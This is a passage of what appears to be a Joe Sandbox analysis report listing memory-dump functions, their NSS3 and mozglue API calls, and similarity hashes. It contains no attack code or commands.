                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1367977078-0
                                                                                                                                                                                                                                                                                          • Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                                                          • Instruction ID: b12a09bc38d2712c28e3a864e2c50789e14bd6e1a61ebd199745ed2ba99c7628
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED110466A04A55A7E700896AAF88F6F736D9B8175CF04C135FE0896B52E731FC0487E2
                                                                                                                                                                                                                                                                                          Function 6C6FAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PORT_ArenaMark_Util.NSS3(00000000,?,6C6F3FFF,00000000,?,?,?,?,?,6C6F1A1C,00000000,00000000), ref: 6C6FADA7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: TlsGetValue.KERNEL32 ref: 6C7514E0
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: EnterCriticalSection.KERNEL32 ref: 6C7514F5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7514C0: PR_Unlock.NSS3 ref: 6C75150D
                                                                                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C6F3FFF,00000000,?,?,?,?,?,6C6F1A1C,00000000,00000000), ref: 6C6FADB4
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C7510F3
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: EnterCriticalSection.KERNEL32(?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75110C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PL_ArenaAllocate.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751141
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: PR_Unlock.NSS3(?,?,?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C751182
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7510C0: TlsGetValue.KERNEL32(?,6C6F8802,00000000,00000008,?,6C6EEF74,00000000), ref: 6C75119C
                                                                                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,6C6F3FFF,?,?,?,?,6C6F3FFF,00000000,?,?,?,?,?,6C6F1A1C,00000000), ref: 6C6FADD5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C748D2D,?,00000000,?), ref: 6C74FB85
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C74FBB1
                                                                                                                                                                                                                                                                                          • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C8194B0,?,?,?,?,?,?,?,?,6C6F3FFF,00000000,?), ref: 6C6FADEC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C74B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8218D0,?), ref: 6C74B095
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F3FFF), ref: 6C6FAE3C
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2372449006-0
                                                                                                                                                                                                                                                                                          • Opcode ID: a14effa22e3b9780f00a6acde8ee81029c8a3739544a14cd2014f15e40ed4119
                                                                                                                                                                                                                                                                                          • Instruction ID: 2e592eba087c6a33a1830e320682c72c8fae1f283b176c3aae3ab76764a36d41
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a14effa22e3b9780f00a6acde8ee81029c8a3739544a14cd2014f15e40ed4119
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B117831E002045BF7109F259D48BBF73E8DF9124EF048228EC2996742FB20F95AC2E6
                                                                                                                                                                                                                                                                                          Function 6C708FE0 Relevance: 7.6, APIs: 5, Instructions: 63threadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_GetThreadPrivate.NSS3(FFFFFFFF,?,6C710710), ref: 6C708FF1
                                                                                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C852158,6C709150,00000000,?,?,?,6C709138,?,6C710710), ref: 6C709029
                                                                                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000,?,?,6C710710), ref: 6C70904D
                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000000,?,?,?,?,6C710710), ref: 6C709066
                                                                                                                                                                                                                                                                                          • PR_SetThreadPrivate.NSS3(00000000,?,?,?,?,6C710710), ref: 6C709078
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: PrivateThread$CallOncecallocmemcpy
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1176783091-0
                                                                                                                                                                                                                                                                                          • Opcode ID: afa033afa6ec5db01de1ceea310450b7c5d91197edc8afbaec6ba70568a44083
                                                                                                                                                                                                                                                                                          • Instruction ID: a51ed399a476b643bd99c47213bf859f636abfcab87ee6c4e256df314b54b607
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afa033afa6ec5db01de1ceea310450b7c5d91197edc8afbaec6ba70568a44083
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 331144B170021257E7601AADAD04A6772ECEB927ACF800831FC94C2B81F796CD44C3F5
                                                                                                                                                                                                                                                                                          Function 6C71CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731E10: TlsGetValue.KERNEL32 ref: 6C731E36
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731E10: EnterCriticalSection.KERNEL32(?,?,?,6C70B1EE,2404110F,?,?), ref: 6C731E4B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C731E10: PR_Unlock.NSS3 ref: 6C731E76
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,6C71D079,00000000,00000001), ref: 6C71CDA5
                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,6C71D079,00000000,00000001), ref: 6C71CDB6
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C71D079,00000000,00000001), ref: 6C71CDCF
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,6C71D079,00000000,00000001), ref: 6C71CDE2
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C71CDE9
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1720798025-0
                                                                                                                                                                                                                                                                                          • Opcode ID: c5f77e08004777c1187bbbf8f947d637f7f38bd0b566fd5b3346dfb963fb309f
                                                                                                                                                                                                                                                                                          • Instruction ID: a8304444e75426387c05f66fc98367eeab99b3d7a576f9bdb1180ed961c06f28
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c5f77e08004777c1187bbbf8f947d637f7f38bd0b566fd5b3346dfb963fb309f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E91186B2B05115BBDF00AEA5EE49996776CFF0426E7184531E90987E02D732E438C7E1
                                                                                                                                                                                                                                                                                          Function 6C782CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C785B40: PR_GetIdentitiesLayer.NSS3 ref: 6C785B56
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C782CEC
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C782D02
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C782D1F
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C782D42
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C782D5B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                          • Instruction ID: 853d113bad4272e50173d1126819823aa3d23d2cec554cd82d67dfe94965187d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DC016BB29012005BE7308E29FD09BC7BBB1EF51319F000435E96D86711D632F414C7A3
                                                                                                                                                                                                                                                                                          Function 6C782D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C785B40: PR_GetIdentitiesLayer.NSS3 ref: 6C785B56
                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C782D9C
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C79C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C79C2BF
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C782DB2
                                                                                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C782DCF
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C782DF2
                                                                                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C782E0B
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 1593528140-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                          • Instruction ID: 762a5e3c0942514483aa16ecb0c8e3cc126e4098304cded5e4a20d9d48204842
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B401C8B1A412005FEA309E29FD0DBC7B7B5EF51319F004435E95E96B11D632F41586A3
                                                                                                                                                                                                                                                                                          Function 6C71AE30 Relevance: 7.6, APIs: 5, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_NewArena_Util.NSS3(00000800,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C71AE42), ref: 6C7030AA
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_ArenaAlloc_Util.NSS3(00000000,000000AC,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C7030C7
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: memset.VCRUNTIME140(-00000004,00000000,000000A8), ref: 6C7030E5
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C703116
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C70312B
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PK11_DestroyObject.NSS3(?,?), ref: 6C703154
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C703090: PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C70317E
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,00000000,?,6C6F99FF,?,?,?,?,?,?,?,?,?,6C6F2D6B,?), ref: 6C71AE67
                                                                                                                                                                                                                                                                                          • SECITEM_DupItem_Util.NSS3(-00000014,?,00000000,?,6C6F99FF,?,?,?,?,?,?,?,?,?,6C6F2D6B,?), ref: 6C71AE7E
                                                                                                                                                                                                                                                                                          • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C6F2D6B,?,?,00000000), ref: 6C71AE89
                                                                                                                                                                                                                                                                                          • PK11_MakeIDFromPubKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,6C6F2D6B,?,?,00000000), ref: 6C71AE96
                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,6C6F2D6B,?,?), ref: 6C71AEA3
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Util$DestroyItem_$Arena_K11_Public$AlgorithmAlloc_ArenaCopyFreeFromMakeObjectTag_Zfreememset
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 754562246-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8ca8d5e6fbb321274d221a51bc2432c806e3bfd9b8aee50a4155745129711669
                                                                                                                                                                                                                                                                                          • Instruction ID: fb9e2f22f21a4df29b03af36a89ea0761da7f338f22d9295b3cbdc6a4e9834a4
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ca8d5e6fbb321274d221a51bc2432c806e3bfd9b8aee50a4155745129711669
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F01A4A7B0811057E701A16CAE9FAAB319C8B87A6CF0C0031E909D7F41F616DD0D47E3
                                                                                                                                                                                                                                                                                          Function 6C80BDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6C807AFE,?,?,?,?,?,?,?,?,6C80798A), ref: 6C80BDC3
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,?,6C807AFE,?,?,?,?,?,?,?,?,6C80798A), ref: 6C80BDCA
                                                                                                                                                                                                                                                                                          • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C807AFE,?,?,?,?,?,?,?,?,6C80798A), ref: 6C80BDE9
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,00000000,?,6C807AFE,?,?,?,?,?,?,?,?,6C80798A), ref: 6C80BE21
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(00000000,00000000,?,6C807AFE,?,?,?,?,?,?,?,?,6C80798A), ref: 6C80BE32
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 3662805584-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 1563900a9f015adbde4b996e09a784a129b7642c36672a0d631bbf2b43e58fa2
                                                                                                                                                                                                                                                                                          • Instruction ID: 23931ea613e174cd9a0aabfd0a1ef513b31f92eaaa7c6257b39794ecd0b86141
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1563900a9f015adbde4b996e09a784a129b7642c36672a0d631bbf2b43e58fa2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3110AB5B022009FDFB0EF29C809B063BB9BB4A25CB940475D50A87711DBBD9418CBD1
                                                                                                                                                                                                                                                                                          Function 6C807C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • PR_Free.NSS3(?), ref: 6C807C73
                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C807C83
                                                                                                                                                                                                                                                                                          • malloc.MOZGLUE(00000001), ref: 6C807C8D
                                                                                                                                                                                                                                                                                          • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C807C9F
                                                                                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C807CAD
                                                                                                                                                                                                                                                                                            • Part of subcall function 6C7B9BF0: TlsGetValue.KERNEL32(?,?,?,6C800A75), ref: 6C7B9C07
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1980736120.000000006C671000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C670000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1980691362.000000006C670000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981059709.000000006C80F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981207599.000000006C84E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981241903.000000006C84F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981281019.000000006C850000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1981320290.000000006C855000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c670000_file.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 105370314-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 338d98c872e1fde7eb9efa577e2762db4744253768d2c7a071d16365e3d058ad
                                                                                                                                                                                                                                                                                          • Instruction ID: 7f0115738c94777badd61eba578dd662bd84f298aff3dc45ebb93569f2e1ed28
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 338d98c872e1fde7eb9efa577e2762db4744253768d2c7a071d16365e3d058ad
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DFF0C2F1A102067BEB109F3A9E0994777ACEF11269F018839E819C3B00E734E114CBE5
                                                                                                                                                                                                                                                                                          Function 6C80ADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C80A6D8), ref: 6C80AE0D
                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C80AE14
                                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(6C80A6D8), ref: 6C80AE36
